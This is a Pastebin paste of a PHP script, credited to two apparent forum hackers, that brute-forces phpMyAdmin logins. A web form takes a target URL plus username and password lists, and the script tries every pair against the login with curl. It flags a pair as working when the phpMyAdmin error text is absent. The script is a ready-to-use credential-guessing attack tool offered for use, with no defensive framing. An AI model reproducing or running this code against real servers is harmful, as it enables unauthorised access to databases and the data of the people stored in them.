Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- ?>
- <html dir="ltr">
- <head>
- <title>PhpMyAdmin Brute Force |By Mr.731MY - DR.THMOORY</title>
- <style>
- *{font-family:tahoma;font-size:12; }
- body{background-color:#f1f1f1;}
- td,tr{text-align:center;}
- td:hover{background-color:#e1e1e1;}
- input[type=submit]{cursor:wait;}
- </style>
- </head>
- <body>
- <center>
- <form method="post">
- <table width="20%">
- <tr>
- <td colspan="2"><input type="text" value="<?=$server;?>" name="server" placeholder="server" size="60" style="direction:ltr;"/></td>
- </tr>
- <tr>
- <td>Passwords</td>
- <td>Users</td>
- </tr>
- <tr>
- <td><textarea name="passwords" cols="20" rows="20" style="direction:ltr;"><?=$passwords;?></textarea></td>
- <td><textarea name="usernames" cols="20" rows="20" style="direction:ltr;"><?=$usernames;?></textarea></td>
- </tr>
- <tr>
- <td>Old Version<input type="radio" name="type1" value="old" <?=($_POST['type1']=='old') ? 'checked' : '' ?>></td>
- <td>New Version<input type="radio" name="type1" value="new" <?=($_POST['type1']=='new') ? 'checked' : '' ?>></td>
- </tr>
- <tr>
- <td colspan="2"><input type="submit" name="start" value="start" /></td>
- </tr>
- </table>
- </form>
- <?
- $usernames = trim($_POST['usernames']);
- $passwords = trim($_POST['passwords']);
- $server = trim($_POST['server']);
- $submit = $_POST['start'];
- $type = $_POST['type1'];
- if($type=='old'){$ver = 1;}else{$ver=2;}
- $array = array(" ","\n"," ");
- if(isset($submit) and !empty($usernames) and !empty($passwords) and !empty($server)){
- $exuser = explode("\n",$usernames);
- foreach($exuser as $exuser){
- $expass = explode("\n",$passwords);
- foreach($expass as $expass){
- $exuser = str_ireplace($array,"",$exuser);
- $expass = str_ireplace($array,"",$expass);
- brute_phpmyadmin(trim($server),trim($exuser),trim( $expass),$ver);
- }
- }
- }
- function brute_phpmyadmin($url,$user,$pass,$verion='1'){
- $ch = curl_init($url);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
- curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
- curl_setopt($ch, CURLOPT_TIMEOUT, 5);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- if($verion==2){
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"pma_username=$user&pma_password=$pass&server=1&target=index.php");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- $exec=curl_exec($ch);
- curl_close($ch);
- if(!eregi("#1045",$exec)){
- echo "Succ : username '$user' and password '$pass'<br />";
- }
- }else{
- $exec = curl_exec($ch);
- curl_close($ch);
- if(!eregi("Wrong username",$exec)){
- echo "Succ : username '$user' and password '$pass'<br />";
- }
- }
- }
- Print "Coder Mr.Mr.731MY , DR.THMOORY <br />";
- print "sec4ever.com : vbspiders.com";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement